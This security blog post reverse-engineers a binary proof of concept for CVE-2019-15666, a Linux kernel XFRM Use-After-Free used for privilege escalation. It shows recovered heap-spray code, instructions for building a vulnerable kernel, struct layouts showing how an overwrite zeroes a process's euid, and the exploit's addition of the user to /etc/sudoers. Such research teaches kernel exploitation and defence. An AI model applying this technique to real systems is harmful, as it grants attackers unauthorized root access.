Exploiting CVE-2019-15666 by reversing the binary PoC

By BU Cyber

On January 15, 2020, security researcher Vitaly Nikolenko published a blog post following the disclosure of CVE-2019-15666. In this post, he details a privilege-escalation exploit using this vulnerability to gain root privileges from a standard user.

Alongside his blog post, he released a technical report as well as a Proof of Concept for his exploit. However, he only published the PoC as a binary, and did not share the source code of his exploit. The exploit is based on a Use-After-Free in the XFRM subsystem. In the technical report, Vitaly briefly sums up the steps needed to trigger the bug, but stays at a relatively high level.

In order to better understand the vulnerability and the way it was exploited, we decided to reverse the PoC. Our goal was mainly to be able to recode the exploit while understanding all the steps of the exploitation process.

Using a Virtual Machine running a vulnerable kernel that could be live-debugged remotely, we followed two different approaches: dynamic and static analysis of the PoC. In the next sections, we detail our findings with these two methods.

Understanding XFRM policies

The exploit revolves around inserting new XFRM policies to trigger a Use-After-Free bug.

XFRM is a Linux kernel subsystem whose job is to handle IPsec features by managing the Security Policy Database (SPD) as well as the Security Association Database (SAD). This article was really helpful in understanding XFRM policies, their role and how they can be manipulated by a user. It also includes an example in C with the correct data structures to use when manipulating XFRM policies within a program.

From the technical report for the vulnerability, we can gather that the exploit is based on the successive insertion of two new policies, followed by two requests and a timer expiry:

the first policy object is inserted with index 0 (auto-generated by the subsystem), direction 0 and priority 0;
the second policy object is inserted with the user-defined index = 4, direction 0, priority 1 (>0) and a timer set;
a XFRM_SPD_IPV4_HTHRESH request is issued to trigger policy rehashing;
a XFRM_FLUSH_POLICY request is then issued, freeing the first policy;
once the timer expires on the second policy, UAF is triggered on the first policy that was freed in the previous step.

The aforementioned article shows how to insert a new security policy, which is exactly what we have to do for the first steps of the exploit, although we need to adjust some values from the generic policy given in the example.

Translating the PoC to human-readable code

To reverse the binary, we mainly used IDA and Ghidra. From the article about XFRM policies, we knew how new policies were inserted, which made the reversing of these functions easier. Since the source code was written in C, the whole reversing process was not too obscure, even though the Ghidra disassembler struggled with these kinds of data structures.

The C code for the exploit and other relevant files can be found on our GitHub.

Identifying syscalls

When looking at the imported functions in IDA, we can see that the syscall() function is used several times in the exploit.

https://blog-cyber.riskeco.com/wp-content/uploads/2020/07/imports.png

Imported functions into the binary

Checking cross-references, the syscall() function is used four times: three times in the main function, and once more in an unnamed sub-function (as the binary is stripped). A syscall table helps to identify which syscalls are involved. It is important to note that the exploit is a 64-bit binary.

The three syscalls in main() are just exit calls, but for the call in the sub-function, the syscall number is 0x143 which corresponds to:

323 common userfaultfd sys_userfaultfd

This syscall is used in a heap spraying technique that will be explained in more detail in the following sections. As the userfaultfd syscall does not have a glibc wrapper, we have to keep the use of syscall() and simply replace the 0x143 with the appropriate SYS_userfaultfd constant in our translated C code.
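As an illustration of calling userfaultfd through syscall(), here is a minimal sketch. It is not the code recovered from the PoC: the open_userfaultfd() and uffd_syscall_number() helpers are hypothetical names, and the sketch only opens the object and performs the UFFDIO_API handshake described in the userfaultfd man page.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <assert.h>
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Syscall number of userfaultfd on the build architecture
 * (323, i.e. 0x143, on x86-64). */
long uffd_syscall_number(void)
{
    return SYS_userfaultfd;
}

/* Hypothetical helper: opens a userfaultfd object and performs the
 * mandatory UFFDIO_API handshake. Returns the file descriptor, or -1 on
 * failure, for instance when the kernel lacks CONFIG_USERFAULTFD or when
 * a sandbox denies the call. */
int open_userfaultfd(int flags)
{
    struct uffdio_api api = { .api = UFFD_API, .features = 0 };
    int fd;

    /* Only these two flags are handled by this sketch. */
    assert((flags & ~(O_CLOEXEC | O_NONBLOCK)) == 0);

    fd = (int)syscall(SYS_userfaultfd, flags);
    if (fd < 0)
        return -1;

    if (ioctl(fd, UFFDIO_API, &api) != 0) {
        close(fd);
        return -1;
    }

    return fd;
}
```

A caller would typically use open_userfaultfd(O_CLOEXEC | O_NONBLOCK) and then register memory ranges on the returned descriptor.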

Bad request flags

Reversing the functions which send messages to the kernel is quite straightforward and produces understandable code:

https://blog-cyber.riskeco.com/wp-content/uploads/2020/07/xfrm_add_policy_0.png

Assembly code for adding a policy

However, the usable flags for a XFRM_MSG_NEWPOLICY request are defined in the include/uapi/linux/netlink.h file:

/* Flags values */

#define NLM_F_REQUEST		0x01	/* It is request message. 	*/
...

/* Modifiers to NEW request */
#define NLM_F_REPLACE   0x100    /* Override existing		*/
#define NLM_F_EXCL      0x200    /* Do not touch, if it exists	*/
#define NLM_F_CREATE    0x400    /* Create, if it does not exist	*/
#define NLM_F_APPEND    0x800    /* Add to end of list		*/

So no coherent combination of flags gives 0x301: it would be NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_EXCL, and 0x100 and 0x200 are contradictory. There are indeed various places in the kernel where the two flags are treated as mutually exclusive. This suggests that the PoC contains some small mistakes or typos.

Other typos in the original sources?
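The decomposition of 0x301 can be checked with a few lines of C. This is only a sketch: the constants are copied from the listing above, while the nlm_new_flags_conflict() and nlm_new_flags_names() helpers are hypothetical names introduced for the illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Values copied from include/uapi/linux/netlink.h, as listed above. */
#ifndef NLM_F_REQUEST
#define NLM_F_REQUEST 0x01
#define NLM_F_REPLACE 0x100
#define NLM_F_EXCL    0x200
#define NLM_F_CREATE  0x400
#define NLM_F_APPEND  0x800
#endif

/* Returns 1 when "override existing" and "do not touch, if it exists"
 * are both requested, 0 otherwise. */
int nlm_new_flags_conflict(unsigned int flags)
{
    return (flags & NLM_F_REPLACE) && (flags & NLM_F_EXCL);
}

/* Writes the names of the known flags set in `flags` into buf,
 * separated by '|'. Returns buf. */
char *nlm_new_flags_names(unsigned int flags, char *buf, size_t len)
{
    static const struct { unsigned int bit; const char *name; } table[] = {
        { NLM_F_REQUEST, "NLM_F_REQUEST" },
        { NLM_F_REPLACE, "NLM_F_REPLACE" },
        { NLM_F_EXCL,    "NLM_F_EXCL" },
        { NLM_F_CREATE,  "NLM_F_CREATE" },
        { NLM_F_APPEND,  "NLM_F_APPEND" },
    };
    size_t i;

    assert(buf != NULL && len > 0);
    buf[0] = '\0';

    for (i = 0; i < sizeof(table) / sizeof(table[0]); i++) {
        size_t used = strlen(buf);
        int n;

        if (!(flags & table[i].bit))
            continue;
        n = snprintf(buf + used, len - used, "%s%s",
                     used ? "|" : "", table[i].name);
        if (n < 0 || (size_t)n >= len - used)
            break; /* output truncated: stop here */
    }
    return buf;
}
```

Calling nlm_new_flags_conflict(0x301) reports the conflict, whereas a value such as 0x401 (NLM_F_REQUEST | NLM_F_CREATE) does not.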

Two IPv6 addresses are defined in the xfrm_add_policy_0() function:

one destination: fe80:0:0:0:0:0:0:aa (fe80::aa), which belongs to the range reserved for link-local addresses;
one source: 0:0:0:0:a00:0:0:0, which leads nowhere.

There is also a useless double copy of the first IPv6 block in the function:

Typo

The second copy was probably meant to target the source address, but daddr and saddr were confused in the code.

The userfaultfd() syscall

Page faults

Page faults are a kind of exception raised by the CPU to inform the OS of an access to some data which is not (yet) mapped in memory. In response to the fault, the OS will allocate more pages to the process and fill these pages with the requested data. It will then update the MMU and tell the CPU to resume execution.

Despite its name, a page fault is not an error but rather a common, expected event. Most of the time, page faults are only handled in kernel space, but the userfaultfd() syscall makes it possible to handle page faults in user space.
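To see how ordinary page faults are, the sketch below maps some anonymous memory, touches each page once and reads the minor fault counter of the process before and after. The count_faults_on_first_touch() helper is a hypothetical name, and the exact count depends on the system (some sandboxes do not even report it), so no particular value should be expected.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <assert.h>
#include <stddef.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <unistd.h>

/* Maps `pages` anonymous pages, writes one byte into each of them and
 * returns the number of minor page faults taken by the process in the
 * meantime, or -1 on error. */
long count_faults_on_first_touch(size_t pages)
{
    struct rusage before, after;
    long page_size = sysconf(_SC_PAGESIZE);
    volatile unsigned char *mem;
    size_t len, i;

    assert(pages > 0 && page_size > 0);
    len = pages * (size_t)page_size;

    /* No physical page is attached to the mapping yet. */
    mem = mmap(NULL, len, PROT_READ | PROT_WRITE,
               MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED)
        return -1;

    if (getrusage(RUSAGE_SELF, &before) != 0) {
        munmap((void *)mem, len);
        return -1;
    }

    /* The first access to each page raises a fault handled by the kernel. */
    for (i = 0; i < pages; i++)
        mem[i * (size_t)page_size] = 1;

    if (getrusage(RUSAGE_SELF, &after) != 0) {
        munmap((void *)mem, len);
        return -1;
    }

    munmap((void *)mem, len);
    return after.ru_minflt - before.ru_minflt;
}
```

On a typical Linux system, count_faults_on_first_touch(64) returns a positive number even though the program never sees any error.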

userfaultfd() was originally created to extend the capabilities of Linux regarding virtual memory: for instance, the new syscall increases the speed of live migration of virtual machines between physical hosts or allows live snapshotting of running processes. Several use-cases of this feature exist and are listed on the page linked above.

Memory manipulation with userfaultfd()

The author of the exploit published an excellent post a few years ago, in which he shares a very powerful technique that uses userfaultfd() and setxattr() in order to exploit Use-After-Free bugs in the Linux kernel via a heap spray.

The main idea is that userfaultfd() gives control over the lifetime of data which is allocated by setxattr() in the kernel space. As is specified in the man page for userfaultfd():

When the last file descriptor referring to a userfaultfd object is closed, all memory ranges that were registered with the object are unregistered and unread events are flushed.

This means that, as long as the file descriptor stays open, the object will stay in kernel space.

Overall, the use of userfaultfd is pretty complex, especially when being weaponized for this kind of exploitation.

Running the exploit

While not mandatory, using a Virtual Machine to run the exploit makes the exploitation easier to follow. A small VM with 2 GB of RAM, 20 GB of disk space, 2 CPUs and a minimal Ubuntu installation is enough.

Building a vulnerable kernel

Downloading the sources

The CVE-2019-15666 has been fixed in the 4.15.0-60.67 kernel for Ubuntu 18.04 LTS (Bionic Beaver).

The list of all the versions can be retrieved thanks to the following command:

$ apt-cache search linux-image-unsigned-4.15 | grep generic
...
linux-image-unsigned-4.15.0-55-generic - Linux kernel image for version 4.15.0 on 64 bit x86 SMP
linux-image-unsigned-4.15.0-58-generic - Linux kernel image for version 4.15.0 on 64 bit x86 SMP
linux-image-unsigned-4.15.0-60-generic - Linux kernel image for version 4.15.0 on 64 bit x86 SMP
linux-image-unsigned-4.15.0-62-generic - Linux kernel image for version 4.15.0 on 64 bit x86 SMP
linux-image-unsigned-4.15.0-64-generic - Linux kernel image for version 4.15.0 on 64 bit x86 SMP
linux-image-unsigned-4.15.0-65-generic - Linux kernel image for version 4.15.0 on 64 bit x86 SMP
linux-image-unsigned-4.15.0-66-generic - Linux kernel image for version 4.15.0 on 64 bit x86 SMP
linux-image-unsigned-4.15.0-69-generic - Linux kernel image for version 4.15.0 on 64 bit x86 SMP
linux-image-unsigned-4.15.0-70-generic - Linux kernel image for version 4.15.0 on 64 bit x86 SMP

In order to get kernel sources from the Ubuntu server, the following line has to be uncommented in the /etc/apt/sources.list file:

deb-src http://fr.archive.ubuntu.com/ubuntu/ bionic main restricted

Then the list of available data has to be refreshed through apt-get update and requirements for compiling a kernel can be downloaded:

# apt-get update
# apt-get build-dep linux linux-image-$(uname -r)
# apt-get install libncurses-dev flex bison openssl libssl-dev dkms libelf-dev libudev-dev libpci-dev libiberty-dev autoconf
# apt-get install fakeroot

The sources of the last kernel before the patch was applied can then be downloaded into a new directory with:

$ mv kernel kernel.old
$ mkdir kernel
$ cd kernel
$ apt-get source linux-image-unsigned-4.15.0-58-generic

A quick look at the verify_newpolicy_info() function defined in the net/xfrm/xfrm_user.c file shows that the patch has not been applied, so the function remains vulnerable as intended.

Compiling the kernel

Recompiling a custom Linux kernel and producing installable packages is well documented, at least for Ubuntu. However, the process is quite heavy and slow, as plenty of useless kernel modules are compiled in order to reproduce an official Ubuntu kernel. It is more efficient to rebuild a kernel manually from the official Ubuntu sources.

The first step is to define a minimal build configuration:

$ cd linux-4.15.0/
$ make defconfig

The features required by the exploit have to be enabled:

$ echo CONFIG_USER_NS=y >> .config
$ echo CONFIG_USERFAULTFD=y >> .config

In order to extract some information about the involved structures from the final vmlinux binary, this extra option is needed:

$ echo CONFIG_DEBUG_INFO=y >> .config

To be able to do some live debugging on the running kernel with gdb, it is advised to select a few extra options:

$ echo CONFIG_GDB_SCRIPTS=y >> .config
$ echo CONFIG_FRAME_POINTER=y >> .config
$ echo CONFIG_KGDB=y >> .config
$ echo CONFIG_KGDB_SERIAL_CONSOLE=y >> .config
$ echo CONFIG_KDB_KEYBOARD=y >> .config

The framebuffer is useful to get boot messages in the TTY console. The relevant options can be quickly grabbed from the current configuration:

$ < /boot/config-5.3.0-46-generic grep _FB_ >> .config

If the VM is running via KVM, the virtio drivers are required for the VM to support the default disk and network card:

$ < /boot/config-5.3.0-46-generic grep _VIRTIO >> .config

All the modules have to be integrated in the core binary to get a standalone kernel, and the configuration also has to be updated:

$ sed -i 's/=m$/=y/' .config
$ make olddefconfig

All these configuration steps can also be run using a provided define-cfg.sh script.

Finally the kernel can be compiled:

$ make -j $(( $(nproc) * 2 ))

The whole compilation process takes about 15 minutes in the small VM we set up.

Booting the vulnerable kernel

The kernel image has to be copied in the /boot directory first:

 # cp arch/x86/boot/bzImage /boot/vmlinuz-4.15.0-lucky

For the boot process, the grub configuration has to be modified:

 # sed -i 's/^GRUB_CMDLINE_LINUX_DEFAULT=.*$/GRUB_CMDLINE_LINUX_DEFAULT="text loglevel=1 kgdboc=ttyS0,115200 nokaslr"/' /etc/default/grub

Moreover it may be convenient to have time to change boot options at startup:

# sed -i 's/^GRUB_TIMEOUT=.*$/GRUB_TIMEOUT=2/' /etc/default/grub
# sed -i 's/^GRUB_TIMEOUT_STYLE=.*$/GRUB_TIMEOUT_STYLE=countdown/' /etc/default/grub

In order to enjoy a bigger TTY console resolution, the framebuffer can be extended too:

# echo GRUB_GFXMODE=1920x1080x16 >> /etc/default/grub
# echo GRUB_GFXPAYLOAD_LINUX=keep >> /etc/default/grub

These values come from the hwinfo tool:

# apt install hwinfo
# hwinfo --framebuffer | grep 1920x
  Mode 0x0387: 1920x1200 (+3840), 16 bits
  Mode 0x0388: 1920x1200 (+5760), 24 bits
  Mode 0x0389: 1920x1200 (+7680), 24 bits
  Mode 0x0390: 1920x1080 (+3840), 16 bits
  Mode 0x0391: 1920x1080 (+5760), 24 bits
  Mode 0x0392: 1920x1080 (+7680), 24 bits

Without hwinfo, available settings can be displayed in a Grub shell (press [c]) thanks to the vbeinfo command.

While in the Grub shell, there is a way to scroll the output of the command by setting a variable:

 set pager=1

Selecting the new kernel as the default kernel is a little more tricky but can be achieved by the update-grub.sh script:

 $ sudo ~/update-grub.sh && sudo reboot

Disabling the useless desktop GUI

To avoid starting a graphical session, systemd must not load the graphical login manager:

# systemctl enable multi-user.target --force
# systemctl set-default multi-user.target

About live debugging

Once the VM is running, triggering kgdb is done with the following command:

# echo g > /proc/sysrq-trigger

On the host side, if /dev/pts/2 refers to the serial device, gdb can be attached to the running kernel using a local copy of the kernel binary and the following command:

$ gdb ./vmlinux -ex 'set remotebaud 115200' -ex 'target remote /dev/pts/2'

Explanation of the exploitation

First clues

The Use-After-Free described in the technical report affects XFRM policies. The size of the relevant structure can be retrieved using gdb:

$ gdb ./vmlinux --batch -ex 'p sizeof(struct xfrm_policy)'
$1 = 784

All policies are thus allocated from the kmalloc-1024 cache, which handles requests for 513 to 1024 bytes.

What is surprising when reading the code recovered from the binary PoC is that the heap spray performed by the original exploit does not fill the memory with user-selected values. This spray is set up using a public technique involving the userfaultfd() and setxattr() syscalls:
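The mapping from an object size to a generic kmalloc cache can be modelled in a few lines. This is a simplified sketch, assuming the usual generic cache sizes (powers of two plus the 96-byte and 192-byte caches); kmalloc_cache_size() is a hypothetical helper, not a kernel function.

```c
#include <assert.h>
#include <stddef.h>

/* Simplified model: returns the object size of the generic kmalloc cache
 * serving a request of `request` bytes, or 0 when the request is larger
 * than the biggest cache modelled here. */
size_t kmalloc_cache_size(size_t request)
{
    /* Assumed list of generic cache sizes. */
    static const size_t sizes[] = {
        8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
    };
    size_t i;

    assert(request > 0);

    for (i = 0; i < sizeof(sizes) / sizeof(sizes[0]); i++) {
        if (request <= sizes[i])
            return sizes[i];
    }
    return 0;
}
```

With this model, the 784 bytes of a struct xfrm_policy land in the 1024-byte cache, like any request between 513 and 1024 bytes.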

...

void *addr;

addr = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (addr == MAP_FAILED)
{
    perror("mmap");
    exit(-1);
}

ret = uffd_setup(addr, 0x1000, flag, idx);

...

setxattr("/etc/passwd", "user.test", addr, 0x400, XATTR_CREATE); 

return ret;

But in the current case, the source buffer for the userfaultfd() copy only contains uninitialized user-space stack data:

...
void *addr;
struct uffdio_copy io_copy;
char src[0x1000];

...

addr = (void *)(msg.arg.pagefault.address & 0xfffffffffffff000);

io_copy.dst = (unsigned long)addr;
io_copy.src = (unsigned long)src;
io_copy.len = 0x1000;
io_copy.mode = 0;

if (...)
{
    if ((ioctl(fd, UFFDIO_COPY, &io_copy)) != 0)
        perror("UFFDIO_COPY");
}
else if ((ioctl(fd, UFFDIO_COPY, &io_copy)) != 0)
    perror("UFFDIO_COPY");
...
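The mask applied to the faulting address simply rounds it down to the start of its page, since UFFDIO_COPY works on page-aligned destinations. As a small sketch, with a hypothetical page_base() helper that takes the page size as a parameter instead of hard-coding 0x1000:

```c
#include <assert.h>
#include <stdint.h>

/* Rounds `addr` down to the beginning of its page.
 * `page_size` must be a power of two (4096 on x86-64). */
uint64_t page_base(uint64_t addr, uint64_t page_size)
{
    assert(page_size != 0 && (page_size & (page_size - 1)) == 0);
    return addr & ~(page_size - 1);
}
```

For a 4096-byte page, this gives the same result as masking with 0xfffffffffffff000.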

So the privilege escalation does not seem to rely on a complex object confusion crafted in kernel space.

The technical report mentions an 8-byte write primitive. What about writing into the struct cred directly? Once again, gdb comes to the rescue! The overwritten pprev field is an 8-byte value located at offset 16 (0x10):

$ gdb ./vmlinux --batch -ex 'pt /o struct xfrm_policy'
/* offset    |  size */  type = struct xfrm_policy {
/*    0      |     8 */    possible_net_t xp_net;
/*    8      |    16 */    struct hlist_node {
/*    8      |     8 */        struct hlist_node *next;
/*   16      |     8 */        struct hlist_node **pprev;

                               /* total size (bytes):   16 */
                           } bydst;
/*   24      |    16 */    struct hlist_node {
/*   24      |     8 */        struct hlist_node *next;
/*   32      |     8 */        struct hlist_node **pprev;

                               /* total size (bytes):   16 */
                           } byidx;
/*   40      |     8 */    rwlock_t lock;
/*   48      |     4 */    refcount_t refcnt;
...

Looking at the struct cred content reveals that the sgid and euid fields together occupy the 8 bytes located at offset 16 (0x10):

$ gdb ./vmlinux --batch -ex 'pt /o struct cred'
/* offset    |  size */  type = struct cred {
/*    0      |     4 */    atomic_t usage;
/*    4      |     4 */    kuid_t uid;
/*    8      |     4 */    kgid_t gid;
/*   12      |     4 */    kuid_t suid;
/*   16      |     4 */    kgid_t sgid;
/*   20      |     4 */    kuid_t euid;
/*   24      |     4 */    kgid_t egid;
/*   28      |     4 */    kuid_t fsuid;
/*   32      |     4 */    kgid_t fsgid;
/*   36      |     4 */    unsigned int securebits;
/*   40      |     8 */    kernel_cap_t cap_inheritable;
/*   48      |     8 */    kernel_cap_t cap_permitted;
/*   56      |     8 */    kernel_cap_t cap_effective;
/*   64      |     8 */    kernel_cap_t cap_bset;
/*   72      |     8 */    kernel_cap_t cap_ambient;
...
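The overlap between the two layouts can be reproduced in user space. The sketch below uses a mock of the first fields of struct cred, written after the gdb dump above (it is not the kernel definition), and a hypothetical store_qword() helper simulating an 8-byte store at a given offset.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* User-space mock of the beginning of struct cred, following the
 * offsets printed by gdb above. */
struct mock_cred {
    int32_t  usage;  /* offset  0 */
    uint32_t uid;    /* offset  4 */
    uint32_t gid;    /* offset  8 */
    uint32_t suid;   /* offset 12 */
    uint32_t sgid;   /* offset 16 */
    uint32_t euid;   /* offset 20 */
    uint32_t egid;   /* offset 24 */
    uint32_t fsuid;  /* offset 28 */
    uint32_t fsgid;  /* offset 32 */
};

_Static_assert(offsetof(struct mock_cred, sgid) == 16, "sgid offset");
_Static_assert(offsetof(struct mock_cred, euid) == 20, "euid offset");

/* Simulates an 8-byte store of `value` at byte offset `off` inside the
 * object, as a stray write through a dangling pointer would do. */
void store_qword(struct mock_cred *cred, size_t off, uint64_t value)
{
    assert(cred != NULL && off + sizeof(value) <= sizeof(*cred));
    memcpy((unsigned char *)cred + off, &value, sizeof(value));
}
```

Storing a zero quadword at offset 16 of such an object clears both sgid and euid and leaves the neighbouring fields untouched.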

The struct cred objects are allocated using a dedicated cache. But as the SLUB allocator merges all similar caches, such objects end up being allocated from the kmalloc-192 cache:

$ gdb ./vmlinux --batch -ex 'p sizeof(struct cred)'
$1 = 168

How could an overwrite on objects from a given cache have consequences on objects belonging to another cache?

Kernel allocator behavior

The struct kmem_cache object handles dynamic memory allocations in the kernel. Its behavior is well-described on the Internet:

https://blog-cyber.riskeco.com/wp-content/uploads/2020/07/understand-html037.png

Layout of the SLAB allocator from the Linux kernel documentation

Each kind of allocator (SLAB, SLUB) relies on slabs managing several physical memory pages. Allocations use these pages as sources to provide allocated memory areas on request. Slabs may exist in one of the following states:

empty: all objects on a slab are free;
partial: slab consists of both used and free objects;
full: all objects on a slab are used.

When the Linux kernel decides to release an empty slab, the corresponding physical pages return to the pool of available pages. Such pages can migrate from one cache to another, depending on the system activity.
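The three states and the moment when a slab becomes releasable can be summed up with a toy model. The structure and function names below are hypothetical; the real allocators track far more information than a pair of counters.

```c
#include <assert.h>
#include <stddef.h>

enum slab_state { SLAB_EMPTY, SLAB_PARTIAL, SLAB_FULL };

/* Toy slab: only the number of objects it can hold and the number of
 * objects currently in use are tracked. */
struct toy_slab {
    unsigned int capacity;
    unsigned int in_use;
};

enum slab_state toy_slab_state(const struct toy_slab *slab)
{
    assert(slab != NULL && slab->in_use <= slab->capacity);

    if (slab->in_use == 0)
        return SLAB_EMPTY;
    if (slab->in_use == slab->capacity)
        return SLAB_FULL;
    return SLAB_PARTIAL;
}

/* Frees one object. Returns 1 when the slab just became empty, which is
 * the point where its pages may go back to the page allocator and later
 * serve another cache; returns 0 otherwise. */
int toy_slab_free_one(struct toy_slab *slab)
{
    assert(slab != NULL && slab->in_use > 0);

    slab->in_use--;
    return toy_slab_state(slab) == SLAB_EMPTY;
}
```

In this model, a slab with two objects left only becomes releasable after the second call to toy_slab_free_one().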

Path of exploitation

The lucky0 exploit makes the XFRM policy #1 overwrite a field in a free XFRM policy #0.

These two objects have to belong to different slabs for the memory of the policy #0 to be turned into an object of a different size:

the policy #1 remains a valid XFRM policy, so this policy stays in the kmalloc-1024 cache;
the policy #0 is freed. If its slab gets freed too, the corresponding memory can be reused by another cache, for instance the kmalloc-192 one used for struct cred objects.

That is exactly what the original exploit does.

Before going into details, here is the big picture:

https://blog-cyber.riskeco.com/wp-content/uploads/2020/07/lucky_process.png

Execution flow of the original exploit

Allocation of policy #0

This operation is done using the call to the xfrm_add_policy_0() function. Then a heap spray is done using setxattr() syscalls. A part of the spray is only launched after the allocation of a xfrm_policy object for policy #0, by unlocking the read operation on pipes.

This is done to ensure distance between the two XFRM policies in memory: this 2-step spray reduces the risk of having the policy #0 and the policy #1 in the same slab as the second step fills all remaining available space in the slab used for policy #0.

Allocation of policy #1 and triggering the bug

The second policy is set up by the call to the xfrm_add_policy1() function. Then the buggy situation is prepared by calling the xfrm_hash_rebuild() and xfrm_flush_policy0() functions. The timer expiring on policy #1 will actually trigger the bug later.

Memory replacement

Closing the second pipe unblocks the other read operations waiting in the userfaultfd() handler: this aborts the blocking read in the uffd_spray_handler() function, the setxattr() syscalls terminate, and the children then proceed to their next operations.

When the setxattr() syscalls terminate, the memory allocated for copying the 1024-byte value into kernel memory is freed. If this memory was near the freed policy #0, chances are that the corresponding slab gets emptied and thus freed too. The next call to setgid() leads to a struct cred allocation, with a potential reuse of the memory used by policy #0.

The tiny code of the setgid() syscall shows an unconditional call to the prepare_creds() function, as confirmed by the trace of a WARN_ON(1) inserted in that function:

Apr 13 12:56:31 ubuntu18 kernel: [   30.088409] ------------[ cut here ]------------
Apr 13 12:56:31 ubuntu18 kernel: [   30.088442] WARNING: CPU: 0 PID: 2405 at kernel/cred.c:296 prepare_creds+0x150/0x160
Apr 13 12:56:31 ubuntu18 kernel: [   30.088443] Modules linked in:
Apr 13 12:56:31 ubuntu18 kernel: [   30.088448] CPU: 0 PID: 2405 Comm: lucky0 Tainted: G        W        4.15.18 #38
Apr 13 12:56:31 ubuntu18 kernel: [   30.088450] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
Apr 13 12:56:31 ubuntu18 kernel: [   30.088454] RIP: 0010:prepare_creds+0x150/0x160
Apr 13 12:56:31 ubuntu18 kernel: [   30.088456] RSP: 0018:ffffc90001f1ff08 EFLAGS: 00010296
Apr 13 12:56:31 ubuntu18 kernel: [   30.088459] RAX: 0000000000000024 RBX: ffff88801c183b40 RCX: 0000000000000006
Apr 13 12:56:31 ubuntu18 kernel: [   30.088461] RDX: 0000000000000007 RSI: 0000000000000086 RDI: ffff88803fc154f0
Apr 13 12:56:31 ubuntu18 kernel: [   30.088463] RBP: ffff88802bf0e200 R08: 0000000000011331 R09: 0000000000000004
Apr 13 12:56:31 ubuntu18 kernel: [   30.088465] R10: 0000000000000000 R11: 0000000000000001 R12: ffff88802bf0e200
Apr 13 12:56:31 ubuntu18 kernel: [   30.088466] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Apr 13 12:56:31 ubuntu18 kernel: [   30.088469] FS:  00007fc32fb81740(0000) GS:ffff88803fc00000(0000) knlGS:0000000000000000
Apr 13 12:56:31 ubuntu18 kernel: [   30.088471] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Apr 13 12:56:31 ubuntu18 kernel: [   30.088480] CR2: 00007f660640fe00 CR3: 000000002bfa4005 CR4: 0000000000360ef0
Apr 13 12:56:31 ubuntu18 kernel: [   30.088482] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
Apr 13 12:56:31 ubuntu18 kernel: [   30.088484] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Apr 13 12:56:31 ubuntu18 kernel: [   30.088485] Call Trace:
Apr 13 12:56:31 ubuntu18 kernel: [   30.088493]  SyS_setgid+0x32/0xb0
Apr 13 12:56:31 ubuntu18 kernel: [   30.088497]  do_syscall_64+0x5b/0x110
Apr 13 12:56:31 ubuntu18 kernel: [   30.088501]  entry_SYSCALL_64_after_hwframe+0x3d/0xa2
Apr 13 12:56:31 ubuntu18 kernel: [   30.088504] RIP: 0033:0x7fc32f759f10
Apr 13 12:56:31 ubuntu18 kernel: [   30.088505] RSP: 002b:00007fffdd090070 EFLAGS: 00000246 ORIG_RAX: 000000000000006a
Apr 13 12:56:31 ubuntu18 kernel: [   30.088508] RAX: ffffffffffffffda RBX: 00007fffdd0900d0 RCX: 00007fc32f759f10
Apr 13 12:56:31 ubuntu18 kernel: [   30.088510] RDX: f8d5916a2c50cf00 RSI: 0000000000000000 RDI: 00000000000003e8
Apr 13 12:56:31 ubuntu18 kernel: [   30.088512] RBP: 00000000000000ca R08: 00007fc32f971330 R09: 00007fc32f96d2b0
Apr 13 12:56:31 ubuntu18 kernel: [   30.088514] R10: 00007fc32f971330 R11: 0000000000000246 R12: 00007fc32f971330
Apr 13 12:56:31 ubuntu18 kernel: [   30.088516] R13: 00007fc32f96d2b0 R14: 00007fffdd0900f0 R15: 00007fc32fb81740
Apr 13 12:56:31 ubuntu18 kernel: [   30.088519] Code: 49 b8 cd ab 78 56 cd ab 34 12 48 89 da 48 89 de 4c 89 c1 48 c7 c7 38 83 1e 82 e8 71 d1 02 00 48 c7 c7 c0 52 1d 82 e8 65 d1 02 00 <0f> 0b eb ab 66 90 66 2e 0f 1f 84 00 00 00 00 00 53 48 89 fb 48 
Apr 13 12:56:31 ubuntu18 kernel: [   30.088557] ---[ end trace ae5a0f95dd91ddd4 ]---

Gaining root access

If a child process got its struct cred overwritten, its euid field now has a zero value. This case is tested with a call to seteuid(0). If this call succeeds, root access is granted!

Once the running process has gained root privileges, it updates the content of the /etc/sudoers file to add the current user as a sudoer without any password restriction, making this privilege level persistent for that user.

Execution path proof

The lucky-trace.patch patch can be applied to the kernel sources to trace the running exploit.

Note that tracing the kernel execution with debug messages can modify the kernel behavior, but in this case the exploit still works.

Overwritten addresses can be retrieved after a few tries (5 here):

# cat $( ls -tr /var/log/syslog* ) | grep overwrite
Apr 13 15:55:57 ubuntu18 kernel: [   16.525727] POLICY overwrite *pprev=ffff88001d5c0808 <- next=0
Apr 13 15:56:12 ubuntu18 kernel: [   31.778637] POLICY overwrite *pprev=ffff88002abf4808 <- next=0
Apr 13 15:56:28 ubuntu18 kernel: [   47.029712] POLICY overwrite *pprev=ffff88001c125008 <- next=0
Apr 13 15:56:44 ubuntu18 kernel: [   62.302815] POLICY overwrite *pprev=ffff880026072008 <- next=0
Apr 13 15:56:59 ubuntu18 kernel: [   77.547406] POLICY overwrite *pprev=ffff88002dd5a008 <- next=0

The last entry corresponds to the successful overwrite: the pprev field of the policy #1 points to the next field of the policy #0, which sits at offset 8 in the structure. So the policy #0 was located at:

0xffff88002dd5a008 - 8 = 0xffff88002dd5a000

A 1024-byte slab covering this location was freed:

# cat $( ls -tr /var/log/syslog* ) | grep "SLAB free" | grep ffff88002dd5
